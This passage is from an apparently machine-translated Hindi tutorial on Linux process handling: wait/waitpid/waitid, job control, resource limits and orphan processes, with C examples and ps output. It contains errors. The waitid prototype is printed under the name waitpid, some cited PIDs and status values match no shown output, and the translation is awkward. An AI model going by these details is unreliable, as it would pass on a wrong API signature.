4688328   88138      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
4688328   88140      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
5942779   89353      0 99 Jan22 ?        2-07:35:24 /sbin/klogd -c 1 -x -x
5942779   91836      0  0 Jan22 ?        00:00:00 [/sbin/klogd -c ] <defunct>
4688328  125358      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
3108506  125359      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
4688328  127456      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
3108506  127457      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
8023807  164138      0  0 05:41 ?        00:00:00 main
8023807  164897 164138  0 05:41 ?        00:00:00 ps -ef

Note - ध्यान दें कि पेरेंट प्रोसेस PID 94 था और चाइल्ड प्रोसेस PID 95 था। पेरेंट प्रोसेस से बाहर निकलने के बाद, चाइल्ड प्रोसेस का PPID 94 से 1 (इनिट प्रोसेस) में बदल गया।

चाइल्ड प्रोसेस / तों की निगरानी के लिए सिस्टम कॉल के वेरिएंट निम्नलिखित हैं -

  • wait()
  • waitpid()
  • waitid()

wait() सिस्टम कॉल नीचे बताए अनुसार बफर में अपनी समाप्ति की स्थिति को समाप्त करने और वापस करने के लिए बच्चों में से एक की प्रतीक्षा करेगा।

#include <sys/types.h>
#include <sys/wait.h>

pid_t wait(int *status);

यह कॉल सफलता पर टर्मिनेट किए गए बच्चे की प्रक्रिया आईडी और -1 विफलता पर लौटाता है। प्रतीक्षा () सिस्टम कॉल वर्तमान प्रक्रिया के निष्पादन को निलंबित कर देती है और अनिश्चित काल तक प्रतीक्षा करती है जब तक कि इसका कोई बच्चा समाप्त नहीं हो जाता। बच्चे से समाप्ति की स्थिति स्थिति में उपलब्ध है।

आइए हम पिछले कार्यक्रम को संशोधित करते हैं, ताकि माता-पिता की प्रक्रिया अब बच्चे की प्रक्रिया का इंतजार करे।

/ * फ़ाइल नाम: parentprocess_waits.c * /

#include<stdio.h>

int main() {
   int pid;
   int status;
   pid = fork();
   
   // Child process
   if (pid == 0) {
      system("ps -ef");
      sleep(10);
      system("ps -ef");
      return 3; //exit status is 3 from child process
   } else {
      sleep(3);
      wait(&status);
      printf("In parent process: exit status from child is decimal %d, hexa %0x\n", status, status);
   }
   return 0;
}

संकलन और निष्पादन कदम

UID         PID   PPID  C STIME TTY          TIME CMD
root          1      0  0 Jan20 ?        00:00:00 /bin/sh /usr/bin/mysqld_safe
mysql       101      1  0 Jan20 ?        00:04:42 /usr/libexec/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib64/mysql/plugin --user=mysql --log-error=/var/log/mariadb/mariadb.log --pid-file=/run/mariadb/mariadb.pid --socket=/var/lib/mysql/mysql.sock
3108506    5445      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
4688328    5446      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
4688328   21894      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
3108506   21895      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
4688328   27309      0  0 Jan22 ?        00:00:00 [/sbin/klogd -c ] <defunct>
3108506   27311      0  0 Jan22 ?        00:00:00 [/sbin/klogd -c ] <defunct>
8295652   32407      0  0 Jan20 ?        00:00:39 /sbin/klogd -c 1 -x -x
4688328   49830      0  0 Jan20 ?        00:00:18 /sbin/klogd -c 1 -x -x
3108506   50854      0  0 Jan20 ?        00:00:18 /sbin/klogd -c 1 -x -x
4688328   64936      0  0 Jan22 ?        00:00:59 [/sbin/klogd -c ] <defunct>
3108506   64937      0  0 Jan22 ?        00:00:59 [/sbin/klogd -c ] <defunct>
4688328   67563      0  0 Jan22 ?        00:00:59 [/sbin/klogd -c ] <defunct>
5942779   68128      0  0 Jan22 ?        00:00:07 /sbin/klogd -c 1 -x -x
3108506   68238      0  0 Jan22 ?        00:00:59 [/sbin/klogd -c ] <defunct>
4688328   68999      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
3108506   69212      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
4688328   74090      0  0 Jan22 ?        00:00:00 [/sbin/klogd -c ] <defunct>
3108506   74091      0  0 Jan22 ?        00:00:00 [/sbin/klogd -c ] <defunct>
4688328   74298      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
3108506   74299      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
6327201   74901      0  0 Jan20 ?        00:00:38 /sbin/klogd -c 1 -x -x
6327201   77274      0  0 Jan20 ?        00:00:27 /sbin/klogd -c 1 -x -x
7528790   78621      0  0 Jan20 ?        00:00:33 /sbin/klogd -c 1 -x -x
7528790   80536      0  0 Jan20 ?        00:01:09 [/sbin/klogd -c ] <defunct>
6327201   80542      0  0 Jan20 ?        00:01:09 [/sbin/klogd -c ] <defunct>
4688328   82050      0  0 Jan22 ?        00:01:59 [/sbin/klogd -c ] <defunct>
3108506   82051      0  0 Jan22 ?        00:01:59 [/sbin/klogd -c ] <defunct>
7528790   84116      0  0 Jan20 ?        00:00:27 /sbin/klogd -c 1 -x -x
7528790   84136      0 19 Jan20 ?        21:19:39 /sbin/klogd -c 1 -x -x
7528790   84140      0  0 Jan20 ?        00:00:28 /sbin/klogd -c 1 -x -x
3108506   84395      0  0 Jan22 ?        00:00:29 [/sbin/klogd -c ] <defunct>
4688328   84396      0  0 Jan22 ?        00:00:29 [/sbin/klogd -c ] <defunct>
5942779   84397      0  0 Jan22 ?        00:00:29 [/sbin/klogd -c ] <defunct>
3108506   84928      0  0 Jan22 ?        00:00:29 [/sbin/klogd -c ] <defunct>
4688328   84929      0  0 Jan22 ?        00:00:29 [/sbin/klogd -c ] <defunct>
5942779   84930      0  0 Jan22 ?        00:00:30 [/sbin/klogd -c ] <defunct>
7528790   84970      0  0 Jan20 ?        00:00:34 /sbin/klogd -c 1 -x -x
3108506   85787      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
4688328   85789      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
5942779   86368      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
5942779   86402      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
5942779   87027      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
7528790   87629      0  0 Jan20 ?        00:00:39 /sbin/klogd -c 1 -x -x
7528790   87719      0  0 Jan20 ?        00:00:27 /sbin/klogd -c 1 -x -x
4688328   88138      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
4688328   88140      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
5942779   89353      0 99 Jan22 ?        2-07:41:15 /sbin/klogd -c 1 -x -x
5942779   91836      0  0 Jan22 ?        00:00:00 [/sbin/klogd -c ] <defunct>
4688328  125358      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
3108506  125359      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
4688328  127456      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
3108506  127457      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
8023807  191762      0  0 05:47 ?        00:00:00 sh -c cd /home/cg/root/8023807; timeout 10s main
8023807  191768 191762  0 05:47 ?        00:00:00 timeout 10s main
8023807  191769 191768  0 05:47 ?        00:00:00 main
8023807  191770 191769  0 05:47 ?        00:00:00 main
8023807  192193      0  0 05:47 ?        00:00:00 sh -c cd /home/cg/root/8023807; timeout 10s main
8023807  192199 192193  0 05:47 ?        00:00:00 timeout 10s main
8023807  192200 192199  0 05:47 ?        00:00:00 main
8023807  192201 192200  0 05:47 ?        00:00:00 main
8023807  192202 192201  0 05:47 ?        00:00:00 ps -ef

Note- भले ही बच्चा 3 की एग्जिट स्थिति लौटाता है, लेकिन पेरेंट प्रक्रिया क्यों देखती है कि 768। सामान्य समाप्ति इस प्रकार है

उच्च आदेश बाइट (बिट्स 8 से 15) निचला क्रम बाइट (0 से 7 तक)
बाहर निकलने की स्थिति (0 से 255) 0

प्रतीक्षा () सिस्टम कॉल में सीमा है जैसे कि यह केवल अगले बच्चे के बाहर निकलने तक इंतजार कर सकता है। यदि हमें किसी विशिष्ट बच्चे के लिए प्रतीक्षा करने की आवश्यकता है तो यह प्रतीक्षा () का उपयोग करना संभव नहीं है, हालांकि, वाट्सएप () सिस्टम कॉल का उपयोग करना संभव है।

वेटपिड () सिस्टम कॉल नीचे बताए अनुसार बफ़र में अपनी समाप्ति की स्थिति को समाप्त करने और वापस करने के लिए निर्दिष्ट बच्चों की प्रतीक्षा करेगा।

#include <sys/types.h>
#include <sys/wait.h>

pid_t waitpid(pid_t pid, int *status, int options);

उपरोक्त कॉल सफलता पर टर्मिनेट किए गए बच्चे की प्रक्रिया आईडी और -1 विफलता पर देता है। वेटपिड () सिस्टम कॉल वर्तमान प्रक्रिया के निष्पादन को निलंबित कर देता है और अनिश्चित काल तक प्रतीक्षा करता है जब तक कि निर्दिष्ट बच्चे (पीआईडी ​​मूल्य के अनुसार) समाप्त न हो जाए। बच्चे से समाप्ति की स्थिति स्थिति में उपलब्ध है।

पिड का मूल्य निम्नलिखित में से कोई भी हो सकता है -

  • < -1 - किसी भी बच्चे की प्रक्रिया के लिए प्रतीक्षा करें जिसकी प्रक्रिया समूह आईडी पीआईडी ​​के निरपेक्ष मूल्य के बराबर है।

  • -1 - किसी भी बच्चे की प्रक्रिया की प्रतीक्षा करें, जो प्रतीक्षा () सिस्टम कॉल के बराबर है।

  • 0 - किसी भी बच्चे की प्रक्रिया की प्रतीक्षा करें जिसकी प्रक्रिया समूह आईडी कॉलिंग प्रक्रिया के बराबर है।

  • >0 - किसी भी बच्चे की प्रक्रिया की प्रतीक्षा करें जिसकी प्रक्रिया आईडी पीआईडी ​​के मूल्य के बराबर है।

डिफ़ॉल्ट रूप से, वेटपिड () सिस्टम कॉल केवल समाप्त बच्चों के लिए प्रतीक्षा करता है लेकिन विकल्प तर्क का उपयोग करके इस डिफ़ॉल्ट व्यवहार को संशोधित किया जा सकता है।

अब हम एक प्रोग्राम को एक उदाहरण के रूप में मानते हैं, इसकी प्रक्रिया आईडी के साथ एक विशिष्ट प्रक्रिया की प्रतीक्षा कर रहे हैं।

/ * फ़ाइल नाम: Waitpid_test.c * /

#include<stdio.h>
#include<unistd.h>
#include<sys/types.h>
#include<sys/wait.h>

int main() {
   int pid;
   int pids[3];
   int status;
   int numprocesses = 0;
   int total_processes = 3;
   while (numprocesses < total_processes) {
      pid = fork();
      
      // Child process
      if (pid == 0) {
         printf("In child process: process id is %d\n", getpid());
         sleep(5);
         return 4;
      } else {
         pids[numprocesses] = pid;
         numprocesses++;
         printf("In parent process: created process number: %d\n", pid);
      }
   }
   
   // Waiting for 3rd child process
   waitpid(pids[total_processes - 1], &status, 0);
   if (WIFEXITED(status) != 0) {
      printf("process %d exited normally\n", pids[total_processes - 1]);
      printf("exit status from child is %d\n", WEXITSTATUS(status));
   } else {
      printf("process %d not exited normally\n", pids[total_processes - 1]);
   }
   return 0;
}

संकलन और निष्पादन के बाद, निम्नलिखित आउटपुट है।

In child process: process id is 32528
In parent process: created process number: 32528
In child process: process id is 32529
In parent process: created process number: 32528
In parent process: created process number: 32529
In child process: process id is 32530
In parent process: created process number: 32528
In parent process: created process number: 32529
In parent process: created process number: 32530
process 32530 exited normally
exit status from child is 4

अब, हमें वेटिड () सिस्टम कॉल के लिए जाँच करें। यह सिस्टम कॉल स्थिति को बदलने के लिए चाइल्ड प्रक्रिया की प्रतीक्षा करता है।

#include <sys/wait.h>

int waitpid(idtype_t idtype, id_t id, siginfo_t *infop, int options);

उपरोक्त प्रणाली कॉल राज्य को बदलने के लिए बच्चे की प्रक्रिया का इंतजार करती है और यह कॉल वर्तमान / कॉलिंग प्रक्रिया को स्थगित कर देती है जब तक कि इसकी कोई भी बच्चा प्रक्रिया आपके राज्य को नहीं बदल देती। तर्क 'infop' बच्चे की वर्तमान स्थिति को रिकॉर्ड करने के लिए है। यदि यह प्रक्रिया पहले ही अपना राज्य बदल चुकी है, तो यह कॉल तुरंत वापस आ जाती है।

आइडाइप का मान निम्नलिखित में से कोई भी हो सकता है -

  • P_PID - किसी भी बच्चे की प्रक्रिया की प्रतीक्षा करें जिसकी प्रक्रिया आईडी आईडी के बराबर है।

  • P_PGID - किसी भी बच्चे की प्रक्रिया के लिए प्रतीक्षा करें, जिसकी प्रक्रिया समूह आईडी आईडी के बराबर है।

  • P_ALL - किसी भी बच्चे की प्रक्रिया के लिए प्रतीक्षा करें और आईडी की अनदेखी की जाती है।

  • विकल्प तर्क यह निर्दिष्ट करने के लिए है कि कौन सा राज्य बदलता है और इसे बिटवाइज़ या ऑपरेशन के साथ नीचे बताए गए झंडे के साथ बनाया जा सकता है -

  • WCONTINUED - किसी भी बच्चे की स्थिति को लौटाता है जिसे रोक दिया गया था और जारी रखा गया है।

  • WEXITED - प्रक्रिया से बाहर निकलने का इंतजार करता है।

  • WNOHANG - तुरंत लौटता है।

  • WSTOPPED - सिग्नल मिलने पर और रुकने की स्थिति में किसी भी बच्चे की प्रक्रिया का इंतजार किया जाता है।

यह कॉल 0 देता है, यदि यह अपने किसी बच्चे की स्थिति के कारण वापस आता है और WNOHANG का उपयोग किया जाता है। यह त्रुटि के मामले में -1 रिटर्न देता है और उपयुक्त त्रुटि संख्या निर्धारित करता है।

/ * फ़ाइल नाम: Waitid_test.c * /

#include<stdio.h>
#include<unistd.h>
#include<sys/types.h>
#include<sys/wait.h>

int main() {
   int pid;
   int pids[3];
   int status;
   int numprocesses = 0;
   int total_processes = 3;
   siginfo_t siginfo;
   while (numprocesses < total_processes) {
      pid = fork();
      
      // Child process
      if (pid == 0) {
         printf("In child process: process id is %d\n", getpid());
         sleep(5);
         return 2;
      } else {
         pids[numprocesses] = pid;
         numprocesses++;
         printf("In parent process: created process number: %d\n", pid);
      }
   }
   
   // Waiting for 3rd child process
   status = waitid(P_PID, pids[total_processes - 1], &siginfo, WEXITED);
   if (status == -1) {
      perror("waitid error");
      return 1;
   }
   printf("Info received from waitid is: ");
   printf("PID of child: %d, real user id of child: %d\n", siginfo.si_pid, siginfo.si_uid);
   return 0;
}

उपरोक्त कार्यक्रम के निष्पादन और संकलन के बाद, निम्नलिखित परिणाम है।

In child process: process id is 35390
In parent process: created process number: 35390
In child process: process id is 35391
In parent process: created process number: 35390
In parent process: created process number: 35391
In child process: process id is 35392
In parent process: created process number: 35390
In parent process: created process number: 35391
In parent process: created process number: 35392
Info received from waitid is: PID of child: 35392, real user id of child: 4581875

इस अध्याय में, हम प्रक्रिया समूह, सत्र और नौकरी नियंत्रण से परिचित होंगे।

Process Group- प्रोसेस ग्रुप एक या अधिक प्रक्रियाओं का एक संग्रह है। एक प्रक्रिया समूह एक या अधिक प्रक्रियाओं का गठन एक ही प्रक्रिया समूह पहचानकर्ता (PGID) को साझा करता है। एक प्रक्रिया समूह ID (PGID) प्रक्रिया ID के समान (pid_t) है। एक प्रक्रिया समूह में एक प्रक्रिया समूह नेता होता है, जो समूह बनाने वाली प्रक्रिया है और जिसकी प्रक्रिया आईडी समूह की प्रक्रिया समूह आईडी बन जाती है।

Sessions - यह विभिन्न प्रक्रिया समूहों का एक संग्रह है।

Job Control- यह एक शेल उपयोगकर्ता को एक साथ कई कमांड (या जॉब्स) निष्पादित करने की अनुमति देता है, एक अग्रभूमि में और शेष सभी पृष्ठभूमि में। नौकरियों को अग्रभूमि से पृष्ठभूमि और इसके विपरीत स्थानांतरित करना भी संभव है।

इसे शेल (BASH) का उपयोग करके उदाहरण प्रोग्राम / s की सहायता से समझते हैं।

  • शेल स्क्रिप्ट (BASH में) basic_commands.sh नाम की बेसिक कमांड (तारीख, प्रतिध्वनि, नींद और कैल) करने के लिए

  • बेसिक कमांड (ps, echo) करने के लिए शेल स्क्रिप्ट (BASH में)

#!/bin/bash
#basic_commands.sh

date
echo "Now sleeping for 250 seconds, so that testing job control functionality is smooth"
sleep 250
cal

#!/bin/bash
#process_status.sh

ps
echo "Now sleeping for 200 seconds, so that testing job control functionality is smooth"
sleep 200
ps

फ़ाइल को निष्पादित करने की अनुमति देने के लिए chmod कमांड का उपयोग करें। डिफ़ॉल्ट रूप से, सामान्य फ़ाइल केवल पढ़ने और लिखने की अनुमति प्राप्त करेगी और अनुमतियों को निष्पादित नहीं करेगी।

वर्तमान चल रही प्रक्रिया को रोकने के लिए, आपको CTRL + Z दर्ज करना होगा। इससे आपको जॉब नंबर मिलता है। नौकरी को अग्रभूमि या पृष्ठभूमि में फिर से शुरू किया जा सकता है। यदि आवश्यक हो, तो अग्रभूमि उपयोग 'एफजी' कमांड में नौकरी को फिर से शुरू करने के लिए। यदि आवश्यक हो, तो पृष्ठभूमि में नौकरी को फिर से शुरू करने के लिए, 'बीजी' कमांड का उपयोग करें। इसका उपयोग करके, यह केवल अंतिम रुकी हुई प्रक्रिया चलाएगा। यदि आप अंतिम रुकी हुई प्रक्रिया से इतर शुरुआत करना चाहते हैं तो क्या होगा? बस fg या bg के बाद जॉब नंबर का उपयोग करें (जैसे bg% 2 या bg% 3, आदि)। यदि रनिंग जॉब पृष्ठभूमि में है, तो आप अग्रभूमि में कोई अन्य कार्य चला सकते हैं। नौकरियों की सूची प्राप्त करने के लिए, कमांड, नौकरियों का उपयोग करें। CTRL + C या मार कमांड के साथ प्रक्रिया को समाप्त करना भी संभव है। किल कमांड का उपयोग करते हुए आप जॉब नंबर पास कर सकते हैं।

निम्नलिखित आउटपुट की जांच करें जो नौकरियों को रोकना दर्शाता है, नौकरियों को अग्रभूमि से पृष्ठभूमि तक ले जाना और इसके विपरीत, नौकरियों को समाप्त करना, आदि।

chmod u+x basic_commands.sh
chmod u+x process_status.sh

./basic_commands.sh
Wed Jul 5 18:30:27 IST 2017
Now sleeping for 250 seconds, so that testing job control functionality is smooth
^Z
[1]+ Stopped ./basic_commands.sh
./process_status.sh
PID   TTY   TIME     CMD
2295  pts/1 00:00:00 bash
4222  pts/1 00:00:00 basic_commands.
4224  pts/1 00:00:00 sleep
4225  pts/1 00:00:00 process_status.
4226  pts/1 00:00:00 ps
Now sleeping for 200 seconds, so that testing job control functionality is smooth
^Z
[2]+ Stopped      ./process_status.sh
jobs
[1]- Stopped      ./basic_commands.sh
[2]+ Stopped      ./process_status.sh
fg
./process_status.sh
^Z
[2]+ Stopped      ./process_status.sh
fg %2
./process_status.sh
^Z
[2]+ Stopped      ./process_status.sh
fg %1
./basic_commands.sh
^Z
[1]+ Stopped      ./basic_commands.sh

jobs
[1]+ Stopped      ./basic_commands.sh
[2]- Stopped      ./process_status.sh

bg %2
[2]- ./process_status.sh &
fg
./basic_commands.sh
^Z
[1]+ Stopped      ./basic_commands.sh
jobs
[1]+ Stopped      ./basic_commands.sh
[2]- Running      ./process_status.sh &
fg %2
./process_status.sh
^Z
[2]+ Stopped      ./process_status.sh
jobs
[1]- Stopped      ./basic_commands.sh
[2]+ Stopped      ./process_status.sh
kill %1 %2
[1]- Stopped      ./basic_commands.sh
[2]+ Stopped      ./process_status.sh

[1]- Terminated   ./basic_commands.sh
[2]+ Terminated   ./process_status.sh

कार्यों को करने के लिए सीपीयू और मेमोरी जैसे प्रक्रिया को कुछ संसाधनों की आवश्यकता होती है। अब हम संसाधन उपयोग और निगरानी के बारे में जानकारी जानने के लिए संबंधित कमांड और सिस्टम कॉल पर गौर करेंगे। इसके अलावा संसाधनों पर प्रत्येक प्रक्रिया के लिए डिफ़ॉल्ट रूप से कुछ सीमाएं हैं, और यदि आवश्यक हो तो आवेदन आवश्यकताओं को समायोजित करने के लिए सीमाएं बढ़ाई जा सकती हैं।

आदेशों का उपयोग करते हुए आवश्यक प्रणाली या प्रक्रिया संसाधन जानकारी निम्नलिखित हैं -

शीर्ष कमान

$ top

शीर्ष कमांड लगातार सिस्टम संसाधनों के उपयोग को प्रदर्शित करता है। यदि कोई भी प्रक्रिया किसी तरह की हैंग अवस्था (सीपीयू या मेमोरी का अधिक उपभोग) में सिस्टम डालती है, तो प्रक्रिया की जानकारी को नोट करना और उचित कार्रवाई करना संभव है (जैसे संबंधित प्रक्रिया को मारना)।

पीएस कमांड

$ ps

पीएस कमांड सभी चल रही प्रक्रियाओं के बारे में जानकारी प्रदान करता है। यह प्रक्रियाओं की निगरानी और नियंत्रण में मदद करता है।

Vmstat कमांड

$ vmstat

Vmstat कमांड वर्चुअल मेमोरी सबसिस्टम के आंकड़ों की रिपोर्ट करता है। यह प्रक्रियाओं की जानकारी (चलने, सोने, चलने योग्य प्रक्रियाएं, इत्यादि), मेमोरी (वर्चुअल मेमोरी की जानकारी जैसे मुफ्त, उपयोग, आदि), स्वैप क्षेत्र, IO डिवाइस, सिस्टम जानकारी (इंटरप्ट की संख्या, संदर्भ स्विच) की सूचना देता है ) और CPU (उपयोगकर्ता, सिस्टम और निष्क्रिय समय)।

Lsof कमांड

$ lsof

Lsof कमांड सिस्टम प्रक्रियाओं सहित सभी मौजूदा चल रही प्रक्रियाओं की खुली फाइलों की सूची प्रिंट करता है।

Getconf कमांड

$ getconf –a

गेटकॉन्फ़ कमांड सिस्टम कॉन्फ़िगरेशन चर जानकारी प्रदर्शित करता है।

अब, संबंधित सिस्टम कॉल पर एक नज़र डालते हैं।

  • सिस्टम कॉल गेट्रेज (), जो सिस्टम संसाधन उपयोग के बारे में जानकारी प्रदान करता है।

  • सिस्टम कॉल एक्सेस और सेटिंग से संबंधित संसाधन सीमाएँ।, getrlimit (), setrlimit (), prlimit ()।

सिस्टम संसाधन उपयोग कॉल

#include <sys/time.h>
#include <sys/resource.h>

int getrusage(int who, struct rusage *usage);

सिस्टम कॉल गेट्रेज () सिस्टम संसाधन उपयोग की जानकारी देता है। इसमें स्वयं के बारे में जानकारी शामिल हो सकती है, "जो" चर के लिए RUSAGE_SELF, RUSAGE_CHILDREN, RUSAGE_THREAD झंडे का उपयोग करके स्वयं या बच्चों को कॉलिंग थ्रेड के बारे में जानकारी शामिल हो सकती है। कॉल के बाद, यह संरचना के रिसाव में जानकारी लौटाता है।

यह कॉल सफलता पर "0" और विफलता पर "-1" लौटाएगा।

आइए हम निम्नलिखित नमूना कार्यक्रम को देखें।

/ * फ़ाइल नाम: sysinfo_getrusage.c * /

#include<stdio.h>
#include<sys/time.h>
#include<sys/resource.h>

void main(void) {
   struct rusage res_usage;
   int retval;
   retval = getrusage(RUSAGE_SELF, &res_usage);
   if (retval == -1) {
      perror("getrusage error");
      return;
   }
   printf("Details of getrusage:\n");
   printf("User CPU time (seconds) is %d\n", (int)res_usage.ru_utime.tv_sec);
   printf("User CPU time (micro seconds) is %d\n", (int)res_usage.ru_utime.tv_usec);
   printf("Maximum size of resident set (kb) is %ld\n", res_usage.ru_maxrss);
   printf("Soft page faults (I/O not required) is %ld\n", res_usage.ru_minflt);
   printf("Hard page faults (I/O not required) is %ld\n", res_usage.ru_majflt);
   printf("Block input operations via file system is %ld\n", res_usage.ru_inblock);
   printf("Block output operations via file system is %ld\n", res_usage.ru_oublock);
   printf("Voluntary context switches are %ld\n", res_usage.ru_nvcsw);
   printf("Involuntary context switches are %ld\n", res_usage.ru_nivcsw);
   return;
}

संकलन और निष्पादन कदम

Details of getrusage:
User CPU time (seconds) is 0
User CPU time (micro seconds) is 0
Maximum size of resident set (kb) is 364
Soft page faults (I/O not required) is 137
Hard page faults (I/O not required) is 0
Block input operations via file system is 0
Block output operations via file system is 0
Voluntary context switches are 0
Involuntary context switches are 1

आइए अब संसाधन सीमाओं तक पहुँचने और स्थापित करने से संबंधित सिस्टम कॉल को देखें।

#include <sys/time.h>
#include <sys/resource.h>

int getrlimit(int resource, struct rlimit *rlim);
int setrlimit(int resource, const struct rlimit *rlim);
int prlimit(pid_t pid, int resource, const struct rlimit *new_limit, struct rlimit *old_limit);

सिस्टम कॉल getrlimit() RLIMIT_NOFILE, RLIMIT_NPROC, RLIMIT_STACK, आदि जैसे संसाधन एक की आवश्यकता को इनपुट करके संरचना की संरचना में संसाधन की सीमा को प्राप्त करता है।

सिस्टम कॉल setrlimit() सीमा के भीतर जहाँ तक संरचना में उल्लिखित संसाधन सीमाएँ हैं।

सिस्टम कॉल prlimit() इसका उपयोग विभिन्न उद्देश्यों के लिए किया जाता है, जैसे कि या तो वर्तमान संसाधन सीमाओं को पुनः प्राप्त करने के लिए या नए मानों के लिए संसाधन सीमाओं को अपडेट करने के लिए।

संरचना के नियम में दो मूल्य शामिल हैं -

  • Soft limit - वर्तमान सीमा

  • Hard limit - अधिकतम सीमा जिसे इसे बढ़ाया जा सकता है।

RLIMIT_NOFILE

RLIMIT_NPROC - अधिकतम प्रक्रियाएं जो उस प्रक्रिया के उपयोगकर्ता के लिए बनाई जा सकती हैं।

RLIMIT_STACK - उस प्रक्रिया के लिए स्टैक सेगमेंट के बाइट्स में अधिकतम आकार।

ये सभी कॉल सफलता पर "0" और विफलता पर "-1" लौटाएंगे।

आइए हम निम्नलिखित उदाहरण पर विचार करें जहां हम गेटलिमिट () सिस्टम कॉल का उपयोग कर रहे हैं।

/ * फ़ाइल नाम: sysinfo_getrlimit.c * /

#include<stdio.h>
#include<sys/time.h>
#include<sys/resource.h>

void main(void) {
   struct rlimit res_limit;
   int retval;
   int resources[] = {RLIMIT_NOFILE, RLIMIT_NPROC, RLIMIT_STACK};
   int max_res;
   int counter = 0;
   printf("Details of resource limits for NOFILE, NPROC, STACK are as follows: \n");
   max_res = sizeof(resources)/sizeof(int);
   while (counter < max_res) {
      retval = getrlimit(resources[counter], &res_limit);
      if (retval == -1) {
         perror("getrlimit error");
         return;
      }
      printf("Soft Limit is %ld\n", res_limit.rlim_cur);
      printf("Hard Limit (ceiling) is %ld\n", res_limit.rlim_max);
      counter++;
   }
   return;
}

संकलन और निष्पादन कदम

Details of resource limits for NOFILE, NPROC, STACK are as follows: 
Soft Limit is 516
Hard Limit (ceiling) is 516
Soft Limit is 256
Hard Limit (ceiling) is 256
Soft Limit is 33554432
Hard Limit (ceiling) is 33554432

चलिए एक अन्य उदाहरण पर विचार करते हैं getrlimit () सिस्टम कॉल के साथ लेकिन अब prlimit () सिस्टम कॉल के साथ।

/ * फ़ाइल नाम: sysinfo_prlimit.c * /

#include<stdio.h>
#include<unistd.h>
#include<sys/time.h>
#include<sys/resource.h>

void main(void) {
   struct rlimit res_limit;
   int retval;
   int resources[] = {RLIMIT_NOFILE, RLIMIT_NPROC, RLIMIT_STACK};
   int max_res;
   int counter = 0;
   printf("Details of resource limits for NOFILE, NPROC, STACK using prlimit are as follows: \n");
   max_res = sizeof(resources)/sizeof(int);
   while (counter < max_res) {
      retval = prlimit(getpid(), resources[counter], NULL, &res_limit);
      if (retval == -1) {
         perror("prlimit error");
         return;
      }
      printf("Soft Limit is %ld\n", res_limit.rlim_cur);
      printf("Hard Limit (ceiling) is %ld\n", res_limit.rlim_max);
      counter++;
   }
   return;
}

संकलन और निष्पादन कदम

Details of resource limits for NOFILE, NPROC, STACK using prlimit are as follows: 
Soft Limit is 516
Hard Limit (ceiling) is 516
Soft Limit is 256
Hard Limit (ceiling) is 256
Soft Limit is 33554432
Hard Limit (ceiling) is 33554432

अब तक, हमने प्रक्रियाओं, इसके निर्माण, माता-पिता और बच्चे की प्रक्रियाओं आदि के बारे में चर्चा की है। चर्चा अन्य संबंधित प्रक्रियाओं, जैसे कि अनाथ प्रक्रिया, ज़ोंबी प्रक्रिया और डेमन प्रक्रिया के बारे में चर्चा किए बिना अधूरी होगी।

अनाथ प्रक्रिया

जैसा कि नाम से संकेत मिलता है, अनाथ का अर्थ है प्रक्रियाविहीन प्रक्रिया। जब हम कोई प्रोग्राम या एप्लिकेशन चलाते हैं, तो एप्लिकेशन के लिए मूल प्रक्रिया शेल होती है। जब हम कांटा () का उपयोग करके एक प्रक्रिया बनाते हैं, तो नई बनाई गई प्रक्रिया बाल प्रक्रिया है और बच्चे को बनाने वाली प्रक्रिया मूल प्रक्रिया है। बदले में, इस की मूल प्रक्रिया शेल है। बेशक, सभी प्रक्रियाओं के जनक init प्रक्रिया (प्रक्रिया आईडी → 1) है।

उपरोक्त एक सामान्य परिदृश्य है, हालांकि, अगर माता-पिता की प्रक्रिया बच्चे की प्रक्रिया से पहले निकल जाती है तो क्या होता है। इसका परिणाम यह है कि, बाल प्रक्रिया अब अनाथ प्रक्रिया बन गई है। फिर इसके माता-पिता के बारे में क्या है, इसका नया माता-पिता सभी प्रक्रियाओं का जनक है, जो कि init प्रक्रिया (प्रक्रिया ID - 1) के अलावा कुछ भी नहीं है।

आइए हम निम्नलिखित उदाहरण का उपयोग करके इसे समझने का प्रयास करें।

/ * फ़ाइल नाम: orphan_process.c * /

#include<stdio.h>
#include<stdlib.h>

int main() {
   int pid;
   system("ps -f");
   pid = fork();
   if (pid == 0) {
      printf("Child: pid is %d and ppid is %d\n",getpid(),getppid());
      sleep(5);
      printf("Child: pid is %d and ppid is %d\n",getpid(),getppid());
      system("ps -f");
   } else {
      printf("Parent: pid is %d and ppid is %d\n",getpid(),getppid());
      sleep(2);
      exit(0);
   }
   return 0;
}

संकलन और निष्पादन कदम

UID         PID   PPID  C STIME TTY    TIME CMD
4581875  180558      0  0 09:19  ?     00:00:00 sh -c cd /home/cg/root/4581875; 
                                       timeout 10s main
4581875  180564 180558  0 09:19  ?     00:00:00 timeout 10s main
4581875  180565 180564  0 09:19  ?     00:00:00 main
4581875  180566 180565  0 09:19  ?     00:00:00 ps -f
Parent: pid is 180565 and ppid is 180564
